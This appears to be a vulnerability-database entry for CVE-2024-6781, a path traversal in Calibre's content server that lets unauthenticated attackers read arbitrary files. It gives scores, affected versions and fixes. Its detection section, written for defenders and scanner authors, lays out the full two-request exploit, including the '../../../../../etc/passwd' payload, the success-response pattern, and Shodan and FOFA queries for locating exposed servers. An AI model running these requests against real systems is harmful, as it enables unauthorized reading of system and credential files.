CVE-2024-6781
published 2024-08-06

CVE-2024-6781: Path traversal in Calibre <= 7.14.0 allows unauthenticated attackers to achieve arbitrary file read.

Priority: P2 · 77 · high · CVSS 3.1 base score: 7.5
CVSS vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
EXPLOIT
EPSS: 62.70% (99.1th percentile)

Affected

5 ranges

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| calibre-ebook | calibre | <= 7.14.0 | |
| calibre | calibre | | |
| calibre | calibre | >= 0 < 7.16.0+ds-1 | 7.16.0+ds-1 |
| calibre | calibre | >= 0 < 7.16.0+ds-1 | 7.16.0+ds-1 |
| debian | calibre | < calibre 7.16.0+ds-1 (forky) | calibre 7.16.0+ds-1 (forky) |

Detection & IOCs (extracted from sources)

  • url: GET /interface-data/books-init HTTP/1.1
  • url: POST /cdb/cmd/export HTTP/1.1
  • command: ["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""]
  • path: ../../../../../etc/passwd
  • First stage: send GET to /interface-data/books-init to extract a valid book_id from '.search_result.book_ids[0]' via JSON extraction, then use it in the exploit POST.
  • Second stage: POST to /cdb/cmd/export with Content-Type: application/json and body ["extra_file", <book_id>, "../../../../../etc/passwd", ""] to trigger path traversal arbitrary file read.
  • Successful exploitation returns HTTP 200 with Content-Type: application/json and a body matching both 'root:.*:0:0:' and '"result":' patterns.
  • No authentication is required; the vulnerability is exploitable by unauthenticated attackers against Calibre's content server.
  • Identify exposed Calibre content servers via Shodan (html:"Calibre") or FOFA (Server: calibre) for attack surface enumeration.
  • The exploit requires a two-step HTTP interaction: first retrieve a valid book_id, then use it in the path traversal POST. A single-request detection will miss the dependency.
  • Affected versions are Calibre <= 7.14.0; fixed in 7.15.0+ (upstream) and 7.16.0+ds-1 (Debian). Ensure version checks in scanners target this range.

CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| osv | | 7.5 | HIGH | |
| vendor_debian | | 7.5 | LOW | |